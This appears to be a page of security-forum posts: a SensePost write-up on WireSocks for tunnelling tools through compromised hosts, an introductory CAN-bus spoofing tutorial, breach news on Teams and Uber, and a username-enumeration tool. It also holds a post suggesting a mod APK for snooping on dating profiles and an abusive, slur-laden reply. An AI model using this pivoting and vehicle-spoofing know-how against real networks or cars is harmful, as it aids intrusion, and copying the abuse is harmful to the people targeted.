  31. WireSocks for Easy Proxied Routing Reading time ~9 min Posted by Michael Kruger on 30 September 2022 Categories: Networking, Offence, Vpn, Windows I built some infrastructure that you could deploy and use to easily tunnel from arbitrary sources over a proxy such as SOCKS, using anything that can run WireGuard. This is convenient in cases where it would be nicer to have a full network route to a target network (with working DNS) vs just having application specific proxy rules. In this post I’ll elaborate a bit on that idea. If you are just looking for the code you can find it here: https://github.com/sensepost/wiresocks. Introduction We often get into a position where some sort of internal device has been compromised and you want to take it further. This involves getting network traffic through your compromised device via a SOCKS proxy. SOCKS proxies are everywhere and there are many examples of Cobalt Strike or Metasploit being used to proxy traffic through an agent or tools like ReGeorg, Pivotnacci or Chisel being used to proxy traffic via a compromised web server or similar. Existing solutions Once you have a SOCKS proxy setup, that is usually when good old reliable proxychains-ng comes into the picture where you’d use it to tunnel the majority of your tooling through the proxy. However, recently a lot of really nice tools have been released which have been made to run on Windows. This comes with the issue of how are we going to trick these Windows applications into using our proxy. The SpectorOps team wrote an excellent post detailing how to use software such as Proxifier and Proxycap on Windows to force your tools to use your proxy. If you haven’t, go read it! Unfortunately, in some edge cases those tools fail or become annoying by not catching all the traffic as you’d like. Having this happen a few times, I was struck with some inspiration. Why not do the redirection at a network level and avoid all the weird Windows nuances? 
Network Level Proxying Luckily for me there already was a project that handled this called tun2socks (originally I used RedSocks, but @RoganDawes showed me tun2socks which removes some of the iptables complexity in RedSocks) which is really just some Golang magic together with some routes that lets you redirect traffic into a tun device and have it push traffic through your SOCKS proxy. This seemed like a great idea, except every time you would want to use it for your Windows machine you would have to setup a Linux router with this installed and route your Windows machine through it. This would be more effort than Proxyfier, I felt. Turns out, we have this easy network tooling that runs on Windows (amongst others) that takes your traffic from one point to another called VPNs. More specifically in this instance I used WireGuard which is an awesome simple VPN that has clients for all manner of operating systems. WireSocks Glueing those two services together, ie. tun2socks and Wireguard, we can connect arbitrary clients via Wireguard and route traffic into a SOCKS proxy and into client networks. High level architecture diagram for WireSocks Using this setup, we can now interact with a remote network, using a traditional network route, complete with DNS resolution (more on that in a moment!). Listing of a Domain Controller’s shared folders via a SOCKS proxy exposed using Cobalt Strike, leveraging WireGuard and tun2socks to reach it. To make getting up and running even simpler I did some searching for docker containers to handle some of the work for me. I found that tun2socks also had a container, xjasonlyu/tun2socks and linuxserver/wireguard which I had previously used for my own WireGuard server. I did some editing of the tun2socks docker container with a simpler entry point to our use case. 
Using docker compose to glue the services together and to set this up quickly on a jump box, I gave it a test and was able to get SeatBelt.exe into the network from my own Windows VM just by connecting to the WireGuard VPN. \o/

[Figure: Running SeatBelt on a remote host, inside the compromised network over our WireGuard tunnel, via a SOCKS proxy.]

DNS via WireSocks

There is one problem though: UDP traffic is not working great (even though SOCKS5 supports it), which causes issues as DNS is over UDP. After fighting with tunnelling UDP traffic and eventually working out that the specific SOCKS proxy I was using did not support UDP, I opted to set up a DNS server which would take UDP requests and forward them on as TCP. This was very easy as the linuxserver/wireguard docker had CoreDNS as its own DNS server for WireGuard clients. After looking at CoreDNS' plugins I discovered the forward plugin supported an option to force TCP. This means that if the client uses the WireGuard CoreDNS server the request would be converted to TCP and would then be captured by tun2socks, solving the issue. Once again I went for an allow list approach so that we can specify which DNS requests get forwarded through the SOCKS proxy, so that we don't spam the victim's internal DNS with random requests. An example Corefile follows:

# Domain that you would like to convert to TCP so that
# it gets pushed through tun2socks
example.zzz {
    loop
    log
    # Change IP to that of the internal DNS server you want to use.
    forward . 123.123.123.123:53 {
        force_tcp
    }
}

Bringing it all together

To get this all set up easily, I created a basic Dockerfile based off the one in the tun2socks repo so that it would take my own entrypoint.sh. My entrypoint removed a lot of the iptables marks in the original and instead just parses some environment variables such as $TUN_INCLUDED_ROUTES to add routes in the docker container running tun2socks.
# Add one route per comma-separated entry in $TUN_INCLUDED_ROUTES,
# pointing each at the tun2socks TUN interface named in $TUN.
config_route() {
    for addr in $(echo "$TUN_INCLUDED_ROUTES" | tr ',' '\n'); do
        ip route add "$addr" dev "$TUN"
    done
}

This docker now would set up the TUN interface and the configured routes would be redirected into the TUN and therefore into the SOCKS proxy. Now I just needed to run the second WireGuard docker and get it to use the same routes as well as have access to the network namespace of the tun2socks docker so it could use the TUN interface. Or I could just add a WireGuard server to the tun2socks docker. Turns out the first option is easier. It is possible to tell a docker to use the network namespace of another container when it gets set up. This is done by specifying container:container_name as a --net option like below:

docker run -it --rm --net container:wiresocks alpine /bin/sh

The above command would run an alpine container but its network stack would be the same as the wiresocks container, which includes all the routes as well as the TUN interface. This allows you to generically add any dockerised tools into that namespace which would obey the routes and essentially be SOCKS'd via the proxy. This means you can bring any docker container into the same namespace and have it access the same network!

[Figure: Using the same namespace trick to attach a docker container with impacket tools installed to use the same socks proxy hack.]

Going back to WireGuard, I created a docker-compose that handles most of the setup for you so that you can have any client machine get routed via SOCKS transparently: https://github.com/sensepost/wiresocks/blob/main/docker-compose.yml

Getting started with Wiresocks

Using WireSocks should be pretty simple. You need a host (say a jump box), a proxy (such as SOCKS) into your target network (your jump box should be able to reach it), and docker compose installed. Then, clone the WireSocks repository, copy the example .env.example file to .env, edit it appropriately and run docker compose up -d.
With the stack up and running, you should see a new config/ directory which will contain the WireGuard client configuration files you'd need to configure on your clients (like Windows, Linux, macOS etc.).

Conclusion

So all of this provides a generic way to get a computer's TCP traffic into a SOCKS proxy without too much funny business. UDP support is something that the SOCKS proxy would need support for, and it also needs to play nicely with tun2socks, so if someone can figure that out before me, please let me know! The tool/docker can be found here: https://github.com/sensepost/wiresocks

Hopefully this helps some people who have been frustrated by their tools not using their SOCKS.

Source: https://sensepost.com/blog/2022/wiresocks-for-easy-proxied-routing/
    1 point
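A small helper, added here and not part of the WireSocks repository or the post above, that validates the comma-separated TUN_INCLUDED_ROUTES value before any `ip route add` is issued and renders a Corefile in the same shape as the example above for an allow list of zones. TUN_INCLUDED_ROUTES is the post's own variable name; the zone list, resolver address and sample values are constructed for this example.

```python
"""Validate a WireSocks-style TUN_INCLUDED_ROUTES value and render a CoreDNS
Corefile for an allow list of zones.  Added example; not code from the
sensepost/wiresocks repository.  TUN_INCLUDED_ROUTES is the post's name; the
zone list and resolver address are constructed inputs."""
import ipaddress
from typing import List


def parse_routes(tun_included_routes: str) -> List[str]:
    """Split the comma-separated list, normalise each entry to CIDR notation,
    drop blanks and duplicates, and raise on anything that is not a network.
    A bare host such as 192.168.5.7 becomes 192.168.5.7/32."""
    seen = set()
    routes = []
    for raw in tun_included_routes.split(","):
        raw = raw.strip()
        if not raw:
            continue  # tolerate trailing commas and blank entries
        try:
            net = ipaddress.ip_network(raw, strict=False)
        except ValueError as exc:
            raise ValueError(f"bad route entry {raw!r}: {exc}") from exc
        cidr = net.with_prefixlen
        if cidr not in seen:
            seen.add(cidr)
            routes.append(cidr)
    return routes


def route_commands(tun_included_routes: str, tun: str = "tun0") -> List[str]:
    """The same commands the post's config_route() runs, emitted only after
    every entry has passed parse_routes()."""
    return [f"ip route add {cidr} dev {tun}" for cidr in parse_routes(tun_included_routes)]


def render_corefile(zones: List[str], internal_dns: str) -> str:
    """One CoreDNS server block per allow-listed zone, each forwarding to the
    internal resolver with force_tcp so tun2socks can carry the query."""
    ipaddress.ip_address(internal_dns)  # raises on a malformed resolver address
    blocks = []
    for zone in zones:
        zone = zone.strip().rstrip(".")
        if not zone:
            continue
        blocks.append(
            f"{zone} {{\n"
            "    loop\n"
            "    log\n"
            f"    forward . {internal_dns}:53 {{\n"
            "        force_tcp\n"
            "    }\n"
            "}\n"
        )
    return "\n".join(blocks)


if __name__ == "__main__":
    # Constructed sample values standing in for the .env file.
    print("\n".join(route_commands("10.10.0.0/16, 192.168.5.7,10.10.0.0/16", "tun0")))
    print(render_corefile(["example.zzz", "corp.example"], "123.123.123.123"))
```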
  32. @alezu2000 check Skype 🤗
    1 point
  33. A Microsoft logo sits illuminated at the World Mobile Congress at the Fira Gran Via Complex on Feb. 22, 2016, in Barcelona, Spain. (Photo by David Ramos/Getty Images)

Researchers on Tuesday reported that this past August they identified an attack path that lets malicious actors with file system access steal credentials for any Microsoft Teams user who's logged on.

In a Sept. 13 blog post, the Vectra Protect team said that because attackers do not require elevated permissions to read these files, it exposes this potential concern to any attack that provides malicious actors with local or remote system access. The researchers said this vulnerability impacted all commercial and Government Community Cloud Desktop Teams clients for Windows, Mac and Linux. Microsoft has been made aware of this issue and closed the case in late August, stating that it did not meet its bar for immediate servicing.

The Vectra researchers said until Microsoft moves to update the Teams Desktop Application, they don't recommend using the full Teams client and advise customers to consider using the web-based Teams application exclusively. The researchers said security teams should use the web-based Teams client inside Microsoft Edge, which has multiple OS-level controls to protect against token leaks. They said the Teams web application is robust and supports most features enabled through the desktop client, keeping the organization's productivity impacts to a minimum. For customers that must use the installed desktop application, the researchers said it's critical to watch key application files for access by any processes other than the official Teams application.

When asked Thursday if the situation had changed, Aaron Turner, CTO, SaaS Protect at Vectra, said to the Vectra team's knowledge, Microsoft had not changed its stance.

Turner said in Vectra's interactions with customers, only those organizations with extreme exposure to sophisticated adversaries (defense contractors, critical infrastructure operators) are seriously considering eliminating the Teams.exe application on endpoints and forcing users to collaborate through Teams via a managed browser. Turner said most of the organizations he has talked to plan on implementing an endpoint detection and response monitoring policy to watch for any situations of unauthorized access by a system process to the file storage locations where the tokens are stored.

Turner added that the work Vectra's Connor Peoples spearheaded to discover this vulnerability and coordinate his findings with Microsoft is part of Vectra's efforts to help make the Microsoft 365 ecosystem a safer and fairer place for any organization to communicate and collaborate. As outlined in the research, Turner said there are some improvements that Microsoft can make to shore up the Electron application for Windows and macOS. He said those improvements should also help prevent future vulnerabilities, such as other recently disclosed problems relating to XSS attacks and potential command and control activity using GIFs.

Sammy Migues, principal scientist at Synopsys Software Integrity Group, said like every application framework, Electron has its own idiosyncrasies related to authentication, secure file storage, and communications. Migues said development teams use frameworks for the same reason they use lots of other open source — it makes their jobs easier and faster. On the other hand, even security-aware teams might not understand what's really going on in the depths of the framework they're using. Migues said in this case, it appears that Electron might save some sensitive data in an insecure way.

Via scmagazine.com/
    1 point
  34. Ride-hailing giant Uber disclosed Thursday it's responding to a cybersecurity incident involving a breach of its network and that it's in touch with law enforcement authorities.

The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter.

The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach. The publication said the malicious intruder compromised an employee's Slack account and leveraged it to broadcast a message that the company had "suffered a data breach," in addition to listing internal databases that are supposed to have been compromised.

"It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees," the New York Times said.

Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be an 18-year-old teenager, social-engineered the employee to get hold of their password by masquerading as a corporate IT person and used it to obtain a foothold into the internal network.

"Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface," Kevin Reed, chief information security officer at Acronis, told The Hacker News.

This is not Uber's first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and ultimately paying off the hackers $100,000 to hide the breach. It became public knowledge only in late 2017.

Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had "instructed his team to keep knowledge of the 2016 breach tightly controlled." Sullivan has contested the accusations.

In December 2021, Sullivan was handed three additional counts of wire fraud on top of the previously filed felony obstruction and misprision charges. "Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack," the superseding indictment said. It further said he "took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach."

The latest breach also comes as the criminal case against Sullivan went to trial in the U.S. District Court in San Francisco.

"The compromise is certainly bigger compared to the breach in 2016," Reed said. "Whatever data Uber keeps, the hackers most probably already have access."

Source: https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html
    1 point
  35. I think it would be easier and more legal to have an honest conversation or to hire a detective. Or install Badoo Mod APK right away to search the dating database.
    1 point
  36. I updated both IPBoard and the theme, but it seems the problems persist; I have no idea why and I don't have time to investigate either.
    1 point
  37. >Day after day I argue with life
    1 point
  38. socialscan is an accurate command-line tool to check for email and social media username usage on online platforms. Given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms.

Other similar tools check username availability by requesting the profile page of the username in question and, based on information like the HTTP status code or error text on the requested page, determine whether a username is already taken. This is a naive approach that fails in the following cases:

- Reserved keywords: Most platforms have a set of keywords that they don't allow to be used in usernames (A simple test: try checking reserved words like 'admin' or 'home' or 'root' and see if other services mark them as available)
- Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist

Therefore, these tools tend to come up with false positives and negatives. This method of checking is also dependent on platforms having web-based profile pages and cannot be extended to email addresses. socialscan aims to plug these gaps by directly querying the registration servers of the platforms instead, retrieving the appropriate CSRF tokens, headers, and cookies.

Install

With pip:

> pip install socialscan

From source:

> git clone https://github.com/iojw/socialscan.git
> cd socialscan
> pip install .

Usage

usage: socialscan [list of usernames/email addresses to check]

optional arguments:
  -h, --help            show this help message and exit
  --platforms [platform [platform ...]], -p [platform [platform ...]]
                        list of platforms to query (default: all platforms)
  --view-by {platform,query}
                        view results sorted by platform or by query (default: query)
  --available-only, -a  only print usernames/email addresses that are available and not in use
  --cache-tokens, -c    cache tokens for platforms requiring more than one HTTP request (Snapchat, GitHub, Instagram. Lastfm & Tumblr), reducing total number of requests sent
  --input input.txt, -i input.txt
                        file containg list of queries to execute
  --proxy-list proxy_list.txt
                        file containing list of HTTP proxy servers to execute queries with
  --verbose, -v         show query responses as they are received
  --show-urls           display profile URLs for usernames on supported platforms (profiles may not exist if usernames are reserved or belong to deleted/banned accounts)
  --json json.txt       output results in JSON format to the specified file
  --version             show program's version number and exit

You can download socialscan here: socialscan-v1.4.2.zip

Or read more here.

Sources: darknet.org.uk, github.com
    1 point
  39. Take a look here too: https://regexlib.com/ and https://regex101.com/
    1 point
  40. The goal of this article is to get you started hacking cars — fast, cheap, and easy. In order to do this, we'll spoof the RPM gauge as an example. The following is by no means an exhaustive tutorial. It instead aims to provide just enough information to get you up and running. If you want to dig deeper you can check out the must-reads at the end.

If you decide to carry out this tutorial in real life, you'll need a Linux computer (or a virtual Linux machine), and a CAN-to-USB device (which we'll look into later).

A car is a network

A car consists of multiple computers to control the engine, transmission, windows, locks, lights, etc. These computers are called electronic control units (ECUs) and communicate with each other over a network. For example, when you press the button on your steering wheel to increase the volume of the radio, the steering wheel ECU sends a command to increase volume onto the network; the radio ECU then sees this command and acts accordingly.

There are multiple networks in a car, generally at least two:

- One for critical data such as engine and powertrain messages
- And one for less critical data such as radio and door locks

The critical network uses a fast and reliable protocol whereas the non-critical network uses a slower, less reliable but cheaper protocol. The number of networks as well as which ECUs are networked together depends on the car make, model and year. An ECU could also be connected to multiple networks.

Reference link: https://www.freecodecamp.org/news/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec/

Connecting to a network

Some networks can be accessed via the OBD-II port. OBD-II is mandatory on all cars and light trucks built in the US after 1996 and Europe after 2004. The connector is within arm's reach of the driver's seat. You might need to lift off some plastic cover but it is always accessible without tools.
Software

To communicate with the device you need to install the can-utils package on your Linux machine. You can do this by typing the following into the Linux prompt:

sudo apt-get install can-utils

can-utils makes it extremely easy to send, receive and analyze CAN packets. These are the commands that we will use:

- cansniffer: display only the packets that are changing
- candump: dump all received packets
- cansend: send a packet

Linux has CAN support built into the kernel via SocketCAN. This makes it easy to write your own additional programs. You can interact with the CAN bus in the same way you would interact with any other network, i.e. via sockets.
    1 point
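As an added example (not code from the tutorial above or from can-utils), the change-only filtering that cansniffer performs, run over a few constructed candump lines, together with the classic can_frame layout that a SocketCAN socket expects, which is what "interacting with the bus via sockets" comes down to. The lines in SAMPLE_CAPTURE are constructed for this example, not a real vehicle trace.

```python
"""cansniffer-style change detection over captured candump output, plus the
SocketCAN can_frame layout used when talking to the bus through a socket.
Added example; not code from the tutorial or from can-utils.  The candump
lines in SAMPLE_CAPTURE are constructed, not a real vehicle trace."""
import re
import struct
from typing import Dict, List, Optional, Tuple

# Default candump output looks like: "  vcan0  244   [4]  00 00 00 00"
_CANDUMP_RE = re.compile(
    r"^\s*(?P<iface>\S+)\s+(?P<can_id>[0-9A-Fa-f]+)\s+\[(?P<dlc>\d+)\]"
    r"\s*(?P<data>(?:[0-9A-Fa-f]{2}\s*)*)$"
)
# Classic can_frame as documented for Python's AF_CAN sockets:
# can_id (u32), dlc (u8), 3 padding bytes, 8 data bytes = 16 bytes.
CAN_FRAME_FMT = "=IB3x8s"


def parse_candump_line(line: str) -> Optional[Tuple[str, int, bytes]]:
    """Return (interface, can_id, data), or None if the line is malformed
    or its DLC disagrees with the number of data bytes printed."""
    m = _CANDUMP_RE.match(line)
    if not m:
        return None
    data = bytes.fromhex(m.group("data").replace(" ", ""))
    if len(data) != int(m.group("dlc")) or len(data) > 8:
        return None
    return m.group("iface"), int(m.group("can_id"), 16), data


def changing_frames(lines: List[str]) -> List[Tuple[int, bytes, bytes]]:
    """What cansniffer shows: (id, previous, current) only when an ID's
    payload differs from the last payload seen for that same ID."""
    last: Dict[int, bytes] = {}
    changes = []
    for line in lines:
        parsed = parse_candump_line(line)
        if parsed is None:
            continue  # skip headers, blank lines and corrupt records
        _, can_id, data = parsed
        prev = last.get(can_id)
        if prev is not None and prev != data:
            changes.append((can_id, prev, data))
        last[can_id] = data
    return changes


def pack_can_frame(can_id: int, data: bytes) -> bytes:
    """Build the 16-byte frame an AF_CAN socket's send() expects."""
    if len(data) > 8:
        raise ValueError("classic CAN carries at most 8 data bytes")
    return struct.pack(CAN_FRAME_FMT, can_id, len(data), data.ljust(8, b"\x00"))


def unpack_can_frame(frame: bytes) -> Tuple[int, bytes]:
    """Inverse of pack_can_frame for a frame read from the socket."""
    can_id, dlc, data = struct.unpack(CAN_FRAME_FMT, frame)
    return can_id, data[:dlc]


SAMPLE_CAPTURE = [  # constructed candump lines
    "  vcan0  244   [4]  00 00 00 00",
    "  vcan0  188   [2]  01 02",
    "  vcan0  244   [4]  00 00 10 00",
    "  vcan0  188   [2]  01 02",
    "  vcan0  244   [4]  00 00 20 00",
]
```

Running changing_frames(SAMPLE_CAPTURE) reports only the two changes on ID 0x244; ID 0x188, which repeats the same payload, is suppressed exactly as cansniffer would.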
  41. dude, are you fucking retarded? who the fuck said anything about that forum here on RST, can't you see you're going off topic ... shut down the PC and relax, do something useful with your life ... stop trying to pad your portfolio with a character like that, you can't prove you're older than 16, once you come of age you'll understand more things, see you! P.S: Please tell your father to use condoms in "plm" so we don't have more nuisances like you in the world. Dumb kid, if you give -1 do you feel prouder? you're ridiculous. x2
    1 point